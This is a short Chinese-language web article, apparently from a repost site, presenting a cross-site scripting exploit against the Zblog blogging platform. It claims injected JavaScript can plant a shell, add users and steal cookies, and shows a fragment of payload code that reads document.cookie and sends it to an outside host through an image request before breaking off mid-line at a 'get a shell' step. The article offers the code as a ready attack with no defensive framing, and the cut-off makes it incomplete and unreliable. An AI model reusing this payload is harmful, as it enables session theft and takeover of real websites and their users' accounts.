Zblog最新跨站漏洞及利用代码

2022-12-08 06:16:03分类:网络安全 / 入侵防御阅读(8705)评论(0)

Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexOf(‘password’)==-1?0:1;

  tolocation=’https://www.0133.cn/’;

  //get cookie

  x=new Image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txaContent=

以上就是Zblog最新跨站漏洞及利用代码的详细内容,更多请关注0133技术站其它相关文章!

赞(0) 打赏
未经允许不得转载:0133技术站首页 » 入侵防御

相关文章

网络安全

手机安全加密解密Exploit业界动态工具使用入侵防御脚本攻防安全其它病毒查杀杀毒防毒安全教程

置顶推荐

猜你喜欢